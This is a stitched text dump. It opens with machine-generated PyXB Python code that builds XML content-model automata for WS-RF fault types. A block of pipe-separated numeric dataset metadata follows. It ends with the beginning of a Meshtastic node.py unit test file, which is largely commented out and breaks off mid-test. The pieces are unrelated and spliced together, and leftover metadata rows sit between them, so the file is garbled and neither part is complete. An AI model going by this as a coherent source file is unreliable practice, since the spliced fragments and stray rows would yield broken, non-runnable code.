    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
    counters.add(cc_2)
    # cc_3: 'Description' may repeat without bound.
    cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
    counters.add(cc_3)
    # cc_4: 'FaultCause' occurs at most once.
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
    counters.add(cc_4)
    states = []
    # st_0: wildcard prefix.  final_update is None, so matching cannot
    # terminate in this state.
    final_update = None
    symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: 'Timestamp'; first state in which matching may terminate.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Timestamp')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 48, 6))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: 'Originator'; ending here requires cc_1 to be satisfiable.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Originator')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: 'ErrorCode'; ending here requires cc_2 to be satisfiable.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'ErrorCode')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: 'Description'; ending here requires cc_3 to be satisfiable.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Description')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # st_5: 'FaultCause'; ending here requires cc_4 to be satisfiable.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_4, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationRejectedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'FaultCause')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    # st_0: loop on further wildcard content (increment cc_0) or advance
    # to 'Timestamp'.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    # st_1: any of the optional trailing elements may follow 'Timestamp'.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    transitions.append(fac.Transition(st_3, [
        ]))
    transitions.append(fac.Transition(st_4, [
        ]))
    transitions.append(fac.Transition(st_5, [
        ]))
    st_1._set_transitionSet(transitions)
    # st_2: repeat 'Originator' (increment cc_1) or move to a later element.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_2._set_transitionSet(transitions)
    # st_3: repeat 'ErrorCode' (increment cc_2) or move to a later element.
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_3._set_transitionSet(transitions)
    # st_4: repeat 'Description' (increment cc_3) or move to 'FaultCause'.
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_4._set_transitionSet(transitions)
    # st_5: repeat 'FaultCause' (bounded by cc_4's max=1).
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_4, True) ]))
    st_5._set_transitionSet(transitions)
    # Third positional argument is False — empty content is not accepted.
    return fac.Automaton(states, counters, False, containing_state=None)
PublisherRegistrationRejectedFaultType._Automaton = _BuildAutomaton_4()
def _BuildAutomaton_5 ():
    """Build the FAC content-model automaton for PublisherRegistrationFailedFaultType.

    Machine-generated by PyXB; structurally identical to the other
    wsrf_bf fault automata in this module: wildcard prefix, 'Timestamp',
    then optional 'Originator', 'ErrorCode', 'Description' (repeatable)
    and 'FaultCause', each governed by a counter condition.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_5
    del _BuildAutomaton_5
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: unbounded leading wildcard content (min=0, max=None).
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
    counters.add(cc_0)
    # cc_1: 'Originator' occurs at most once.
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
    counters.add(cc_1)
    # cc_2: 'ErrorCode' occurs at most once.
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
    counters.add(cc_2)
    # cc_3: 'Description' may repeat without bound.
    cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
    counters.add(cc_3)
    # cc_4: 'FaultCause' occurs at most once.
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
    counters.add(cc_4)
    states = []
    # st_0: wildcard prefix; final_update=None means matching cannot end here.
    final_update = None
    symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: 'Timestamp'; first state in which matching may terminate.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Timestamp')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 48, 6))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: 'Originator'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Originator')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: 'ErrorCode'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'ErrorCode')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: 'Description'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Description')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # st_5: 'FaultCause'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_4, False))
    symbol = pyxb.binding.content.ElementUse(PublisherRegistrationFailedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'FaultCause')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    # st_0: loop on wildcard content or advance to 'Timestamp'.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    # st_1: any optional trailing element may follow 'Timestamp'.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    transitions.append(fac.Transition(st_3, [
        ]))
    transitions.append(fac.Transition(st_4, [
        ]))
    transitions.append(fac.Transition(st_5, [
        ]))
    st_1._set_transitionSet(transitions)
    # st_2: repeat 'Originator' (increment cc_1) or move forward.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_2._set_transitionSet(transitions)
    # st_3: repeat 'ErrorCode' (increment cc_2) or move forward.
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_3._set_transitionSet(transitions)
    # st_4: repeat 'Description' (increment cc_3) or move to 'FaultCause'.
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_4._set_transitionSet(transitions)
    # st_5: repeat 'FaultCause' (bounded by cc_4's max=1).
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_4, True) ]))
    st_5._set_transitionSet(transitions)
    # Third positional argument is False — empty content is not accepted.
    return fac.Automaton(states, counters, False, containing_state=None)
PublisherRegistrationFailedFaultType._Automaton = _BuildAutomaton_5()
def _BuildAutomaton_6 ():
    """Build the FAC content-model automaton for CTD_ANON_4.

    Machine-generated by PyXB: a single self-looping wildcard state
    accepting any number of elements from outside the wsn br-2
    namespace (counter cc_0, min=0, max=None).
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_6
    del _BuildAutomaton_6
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: the wildcard content may repeat without bound.
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 148, 8))
    counters.add(cc_0)
    states = []
    # Single accepting state: lax wildcard for any namespace other than
    # 'http://docs.oasis-open.org/wsn/br-2'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsn/br-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 148, 8))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # Self-loop incrementing cc_0 for each additional wildcard element.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_0._set_transitionSet(transitions)
    # Third positional argument is True — empty content is accepted.
    return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_4._Automaton = _BuildAutomaton_6()
def _BuildAutomaton_7 ():
    """Build the FAC content-model automaton for CTD_ANON_5.

    Machine-generated by PyXB; identical in structure to the CTD_ANON_4
    automaton above: one self-looping wildcard state accepting any
    number of elements from outside the wsn br-2 namespace.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_7
    del _BuildAutomaton_7
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: the wildcard content may repeat without bound.
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 158, 8))
    counters.add(cc_0)
    states = []
    # Single accepting state: lax wildcard for any namespace other than
    # 'http://docs.oasis-open.org/wsn/br-2'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_0, False))
    symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsn/br-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_br.xsd', 158, 8))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # Self-loop incrementing cc_0 for each additional wildcard element.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    st_0._set_transitionSet(transitions)
    # Third positional argument is True — empty content is accepted.
    return fac.Automaton(states, counters, True, containing_state=None)
CTD_ANON_5._Automaton = _BuildAutomaton_7()
def _BuildAutomaton_8 ():
    """Build the FAC content-model automaton for ResourceNotDestroyedFaultType.

    Machine-generated by PyXB; the same wsrf_bf BaseFaultType content
    model as the other fault automata above: wildcard prefix,
    'Timestamp', then optional 'Originator', 'ErrorCode', 'Description'
    (repeatable) and 'FaultCause'.
    """
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_8
    del _BuildAutomaton_8
    import pyxb.utils.fac as fac
    counters = set()
    # cc_0: unbounded leading wildcard content (min=0, max=None).
    cc_0 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
    counters.add(cc_0)
    # cc_1: 'Originator' occurs at most once.
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
    counters.add(cc_1)
    # cc_2: 'ErrorCode' occurs at most once.
    cc_2 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
    counters.add(cc_2)
    # cc_3: 'Description' may repeat without bound.
    cc_3 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
    counters.add(cc_3)
    # cc_4: 'FaultCause' occurs at most once.
    cc_4 = fac.CounterCondition(min=0, max=1, metadata=pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
    counters.add(cc_4)
    states = []
    # st_0: wildcard prefix; final_update=None means matching cannot end here.
    final_update = None
    symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://docs.oasis-open.org/wsrf/bf-2')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 46, 6))
    st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_0)
    # st_1: 'Timestamp'; first state in which matching may terminate.
    final_update = set()
    symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Timestamp')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 48, 6))
    st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
    states.append(st_1)
    # st_2: 'Originator'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_1, False))
    symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Originator')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 50, 6))
    st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_2)
    # st_3: 'ErrorCode'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_2, False))
    symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'ErrorCode')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 52, 6))
    st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_3)
    # st_4: 'Description'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_3, False))
    symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'Description')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 64, 6))
    st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_4)
    # st_5: 'FaultCause'.
    final_update = set()
    final_update.add(fac.UpdateInstruction(cc_4, False))
    symbol = pyxb.binding.content.ElementUse(ResourceNotDestroyedFaultType._UseForTag(pyxb.namespace.ExpandedName(_Namespace_wsrf_bf, 'FaultCause')), pyxb.utils.utility.Location('/tmp/pyxbdist.mqXn05k/PyXB-1.2.4/pyxb/bundles/wssplat/schemas/wsrf_bf.xsd', 74, 6))
    st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
    states.append(st_5)
    # st_0: loop on wildcard content or advance to 'Timestamp'.
    transitions = []
    transitions.append(fac.Transition(st_0, [
        fac.UpdateInstruction(cc_0, True) ]))
    transitions.append(fac.Transition(st_1, [
        fac.UpdateInstruction(cc_0, False) ]))
    st_0._set_transitionSet(transitions)
    # st_1: any optional trailing element may follow 'Timestamp'.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        ]))
    transitions.append(fac.Transition(st_3, [
        ]))
    transitions.append(fac.Transition(st_4, [
        ]))
    transitions.append(fac.Transition(st_5, [
        ]))
    st_1._set_transitionSet(transitions)
    # st_2: repeat 'Originator' (increment cc_1) or move forward.
    transitions = []
    transitions.append(fac.Transition(st_2, [
        fac.UpdateInstruction(cc_1, True) ]))
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_1, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_1, False) ]))
    st_2._set_transitionSet(transitions)
    # st_3: repeat 'ErrorCode' (increment cc_2) or move forward.
    transitions = []
    transitions.append(fac.Transition(st_3, [
        fac.UpdateInstruction(cc_2, True) ]))
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_2, False) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_2, False) ]))
    st_3._set_transitionSet(transitions)
    # st_4: repeat 'Description' (increment cc_3) or move to 'FaultCause'.
    transitions = []
    transitions.append(fac.Transition(st_4, [
        fac.UpdateInstruction(cc_3, True) ]))
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_3, False) ]))
    st_4._set_transitionSet(transitions)
    # st_5: repeat 'FaultCause' (bounded by cc_4's max=1).
    transitions = []
    transitions.append(fac.Transition(st_5, [
        fac.UpdateInstruction(cc_4, True) ]))
    st_5._set_transitionSet(transitions)
    # Third positional argument is False — empty content is not accepted.
    return fac.Automaton(states, counters, False, containing_state=None)
ResourceNotDestroyedFaultType._Automaton = _BuildAutomaton_8()
| 62.741788
| 418
| 0.76331
| 8,840
| 68,765
| 5.74457
| 0.042081
| 0.032708
| 0.053523
| 0.057186
| 0.849533
| 0.844689
| 0.840908
| 0.83758
| 0.815742
| 0.813103
| 0
| 0.027267
| 0.108282
| 68,765
| 1,095
| 419
| 62.799087
| 0.800894
| 0.107409
| 0
| 0.716604
| 1
| 0.149813
| 0.201422
| 0.175831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013733
| false
| 0
| 0.028714
| 0
| 0.198502
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0a1c8fa22f687c9178afabe4340b84a3c6ea4d64
| 51,518
|
py
|
Python
|
meshtastic/tests/test_node.py
|
raldi/Meshtastic-python
|
3332271a97eddb3291ada315011165305ec46d57
|
[
"Apache-2.0"
] | null | null | null |
meshtastic/tests/test_node.py
|
raldi/Meshtastic-python
|
3332271a97eddb3291ada315011165305ec46d57
|
[
"Apache-2.0"
] | null | null | null |
meshtastic/tests/test_node.py
|
raldi/Meshtastic-python
|
3332271a97eddb3291ada315011165305ec46d57
|
[
"Apache-2.0"
] | 1
|
2022-01-24T17:07:30.000Z
|
2022-01-24T17:07:30.000Z
|
"""Meshtastic unit tests for node.py"""
import re
import logging
from unittest.mock import patch, MagicMock
import pytest
from ..node import Node
from ..serial_interface import SerialInterface
from ..admin_pb2 import AdminMessage
from ..channel_pb2 import Channel
from ..radioconfig_pb2 import RadioConfig
#from ..cannedmessages_pb2 import (CannedMessagePluginMessagePart1, CannedMessagePluginMessagePart2,
# CannedMessagePluginMessagePart3, CannedMessagePluginMessagePart4,
# CannedMessagePluginMessagePart5)
from ..util import Timeout
@pytest.mark.unit
def test_node(capsys):
    """Verify a Node can be instantiated and can print its channels and info."""
    node = Node('foo', 'bar')
    node.radioConfig = RadioConfig()
    node.showChannels()
    node.showInfo()
    captured = capsys.readouterr()
    for expected in (r'Preferences', r'Channels', r'Primary channel URL'):
        assert re.search(expected, captured.out)
    assert captured.err == ''
@pytest.mark.unit
def test_node_requestConfig(capsys):
    """Verify requestConfig announces that it is fetching remote preferences."""
    mock_iface = MagicMock(autospec=SerialInterface)
    mock_admin = MagicMock(autospec=AdminMessage)
    with patch('meshtastic.serial_interface.SerialInterface', return_value=mock_iface) as mo, \
         patch('meshtastic.admin_pb2.AdminMessage', return_value=mock_admin):
        node = Node(mo, 'bar')
        node.requestConfig()
        out, err = capsys.readouterr()
        assert re.search(r'Requesting preferences from remote node', out, re.MULTILINE)
        assert err == ''
#@pytest.mark.unit
#def test_node_get_canned_message_with_all_parts(capsys):
# """Test run get_canned_message()"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# # we have a sleep in this method, so override it so it goes fast
# with patch('time.sleep'):
# anode = Node(mo, 'bar')
# anode.cannedPluginMessagePart1 = 'a'
# anode.cannedPluginMessagePart2 = 'b'
# anode.cannedPluginMessagePart3 = 'c'
# anode.cannedPluginMessagePart4 = 'd'
# anode.cannedPluginMessagePart5 = 'e'
# anode.get_canned_message()
# out, err = capsys.readouterr()
# assert re.search(r'canned_plugin_message:abcde', out, re.MULTILINE)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_node_get_canned_message_with_some_parts(capsys):
# """Test run get_canned_message()"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# # we have a sleep in this method, so override it so it goes fast
# with patch('time.sleep'):
# anode = Node(mo, 'bar')
# anode.cannedPluginMessagePart1 = 'a'
# anode.get_canned_message()
# out, err = capsys.readouterr()
# assert re.search(r'canned_plugin_message:a', out, re.MULTILINE)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_one_part(caplog):
# """Test run set_canned_message()"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
# anode.set_canned_message('foo')
# assert re.search(r"Setting canned message 'foo' part 1", caplog.text, re.MULTILINE)
# assert not re.search(r"Setting canned message '' part 2", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_200(caplog):
# """Test run set_canned_message() 200 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
# message_200_chars_long = 'a' * 200
# anode.set_canned_message(message_200_chars_long)
# assert re.search(r" part 1", caplog.text, re.MULTILINE)
# assert not re.search(r"Setting canned message '' part 2", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_201(caplog):
# """Test run set_canned_message() 201 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
